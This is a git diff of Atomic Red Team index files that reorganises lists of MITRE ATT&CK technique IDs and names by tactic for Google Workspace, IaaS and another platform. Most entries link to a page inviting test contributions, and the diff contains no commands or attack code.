+- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.003 Valid Accounts: Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# exfiltration
+- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.004 Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
diff --git a/atomics/Indexes/Indexes-Markdown/google-workspace-index.md b/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
index f5a5e15b11..2003c7f718 100644
--- a/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
+++ b/atomics/Indexes/Indexes-Markdown/google-workspace-index.md
@@ -2,6 +2,7 @@
 # credential-access
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -15,18 +16,20 @@
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# impact
-- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# collection
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1213.005 Messaging Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # defense-evasion
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -39,6 +42,7 @@
 - T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
@@ -50,35 +54,45 @@
 - T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# collection
-- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# lateral-movement
+- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # initial-access
 - T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
 
 # persistence
+- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Account Manipulation: Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -90,6 +104,7 @@
 - T1548.005 Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
@@ -100,14 +115,12 @@
 - T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# lateral-movement
-- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
 # execution
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
+# impact
+- T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
diff --git a/atomics/Indexes/Indexes-Markdown/iaas-index.md b/atomics/Indexes/Indexes-Markdown/iaas-index.md
index df11ec0851..a29f9e89fe 100644
--- a/atomics/Indexes/Indexes-Markdown/iaas-index.md
+++ b/atomics/Indexes/Indexes-Markdown/iaas-index.md
@@ -1,189 +1,629 @@
 # IaaS Atomic Tests by ATT&CK Tactic & Technique
 # defense-evasion
-- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.003 Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.006 Indicator Removal on Host: Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1548.005 Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
